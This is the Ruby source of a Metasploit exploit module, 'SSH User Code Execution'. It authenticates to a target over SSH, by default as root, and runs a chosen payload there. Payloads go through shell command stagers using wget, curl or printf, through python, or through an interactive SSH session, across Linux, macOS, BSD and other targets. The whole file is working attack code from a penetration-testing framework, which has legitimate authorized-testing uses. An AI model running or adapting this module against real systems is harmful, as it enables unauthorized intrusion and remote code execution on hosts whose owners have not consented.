Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::CmdStager
10
  include Msf::Exploit::Remote::SSH
11

12
  attr_accessor :ssh_socket
13

14
  def initialize
15
    super(
16
      'Name'             => 'SSH User Code Execution',
17
      'Description'      => %q(
18
        This module connects to the target system and executes the necessary
19
        commands to run the specified payload via SSH. If a native payload is
20
        specified, an appropriate stager will be used.
21
      ),
22
      'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
23
      'References'       =>
24
        [
25
          [ 'CVE', '1999-0502'] # Weak password
26
        ],
27
      'License'          => MSF_LICENSE,
28
      'Privileged'       => true,
29
      'DefaultOptions'   =>
30
        {
31
          'PrependFork'  => 'true',
32
          'EXITFUNC'     => 'process'
33
        },
34
      'Payload'          =>
35
        {
36
          'Space'        => 800000,
37
          'BadChars'     => "",
38
          'DisableNops'  => true
39
        },
40
      'Platform'         => %w[linux osx unix python bsd],
41
      'CmdStagerFlavor'  => %w[bourne echo printf wget],
42
      'Targets'          =>
43
        [
44
          [
45
            'Linux Command',
46
            {
47
              'Arch'     => ARCH_CMD,
48
              'Platform' => 'linux'
49
            }
50
          ],
51
          [
52
            'Linux x86',
53
            {
54
              'Arch'     => ARCH_X86,
55
              'Platform' => 'linux'
56
            }
57
          ],
58
          [
59
            'Linux x64',
60
            {
61
              'Arch'     => ARCH_X64,
62
              'Platform' => 'linux'
63
            }
64
          ],
65
          [
66
            'Linux armle',
67
            {
68
              'Arch'     => ARCH_ARMLE,
69
              'Platform' => 'linux'
70
            }
71
          ],
72
          [
73
            'Linux mipsle',
74
            {
75
              'Arch'             => ARCH_MIPSLE,
76
              'Platform'         => 'linux',
77
              'CmdStagerFlavor'  => %w[curl wget]
78
            }
79
          ],
80
          [
81
            'Linux mipsbe',
82
            {
83
              'Arch'             => ARCH_MIPSBE,
84
              'Platform'         => 'linux',
85
              'CmdStagerFlavor'  => %w[wget]
86
            }
87
          ],
88
          [
89
            'Linux aarch64',
90
            {
91
              'Arch'     => ARCH_AARCH64,
92
              'Platform' => 'linux'
93
            }
94
          ],
95
          [
96
            'OSX x86',
97
            {
98
              'Arch'             => ARCH_X86,
99
              'Platform'         => 'osx',
100
              'CmdStagerFlavor'  => %w[curl wget]
101
            }
102
          ],
103
          [
104
            'OSX x64',
105
            {
106
              'Arch'             => ARCH_X64,
107
              'Platform'         => 'osx',
108
              'CmdStagerFlavor'  => %w[curl wget]
109
            }
110
          ],
111
          [
112
            'BSD x86',
113
            {
114
              'Arch'             => ARCH_X86,
115
              'Platform'         => 'bsd',
116
              'CmdStagerFlavor'  => %w[printf curl wget]
117
            }
118
          ],
119
          [
120
            'BSD x64',
121
            {
122
              'Arch'             => ARCH_X64,
123
              'Platform'         => 'bsd',
124
              'CmdStagerFlavor'  => %w[printf curl wget]
125
            }
126
          ],
127
          [
128
            'Python',
129
            {
130
              'Arch'     => ARCH_PYTHON,
131
              'Platform' => 'python'
132
            }
133
          ],
134
          [
135
            'Unix Cmd',
136
            {
137
              'Arch'     => ARCH_CMD,
138
              'Platform' => 'unix'
139
            }
140
          ],
141
          [
142
            'Interactive SSH',
143
            {
144
              'DefaultOptions' => {
145
                'PAYLOAD' => 'generic/ssh/interact',
146
                'WfsDelay' => 5
147
              },
148
              'Payload' => {
149
                'Compat' => {
150
                  'PayloadType' => 'ssh_interact',
151
                }
152
              }
153
            }
154
          ]
155
        ],
156
      'DefaultTarget'    => 0,
157
      # For the CVE
158
      'DisclosureDate'   => 'Jan 01 1999',
159
      'Notes'            =>
160
        {
161
          'Stability'   => [ CRASH_SAFE, ],
162
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
163
          'Reliability' => [ REPEATABLE_SESSION, ],
164
        },
165
    )
166

167
    register_options(
168
      [
169
        OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
170
        OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
171
        Opt::RHOST(),
172
        Opt::RPORT(22)
173
      ]
174
    )
175

176
    register_advanced_options(
177
      [
178
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
179
      ]
180
    )
181
  end
182

183
  def execute_command(cmd, opts = {})
184
    vprint_status("Executing #{cmd}")
185
    begin
186
      Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }
187
    rescue Timeout::Error
188
      print_warning('Timed out while waiting for command to return')
189
      @timeout = true
190
    end
191
  end
192

193
  def do_login(ip, user, pass, port)
194

195
    opt_hash = ssh_client_defaults.merge({
196
      auth_methods: ['password', 'keyboard-interactive'],
197
      port: port,
198
      password: pass
199
    })
200

201
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
202

203
    begin
204
      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
205
    rescue Rex::ConnectionError
206
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
207
    rescue Net::SSH::Disconnect, ::EOFError
208
      fail_with(Failure::Disconnected, 'Timed out during negotiation')
209
    rescue Net::SSH::AuthenticationFailed
210
      fail_with(Failure::NoAccess, 'Failed authentication')
211
    rescue Net::SSH::Exception => e
212
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
213
    end
214

215
    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
216
  end
217

218
  def binary_exists(binary, platform: nil)
219
    Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))
220
  end
221

222
  def execute_python
223
    python_binary = binary_exists('python', platform: 'unix')
224
    python_binary ||= binary_exists('python3', platform: 'unix')
225
    python_binary ||= binary_exists('python2', platform: 'unix')
226
    fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?
227

228
    execute_command("echo \"#{payload.encoded}\" | #{python_binary}")
229
  end
230

231
  def exploit
232
    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
233

234
    if target.name == 'Interactive SSH'
235
      handler(ssh_socket)
236
      return
237
    end
238

239
    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
240

241
    case target['Platform']
242
    when 'python'
243
      execute_python
244
    when 'unix'
245
      execute_command(payload.encoded)
246
    else
247
      if target['Arch'] == ARCH_CMD
248
        execute_command(payload.encoded)
249
      else
250
        execute_cmdstager(linemax: 500)
251
      end
252
    end
253

254
    @timeout ? ssh_socket.shutdown! : ssh_socket.close
255
  end
256
end
257

258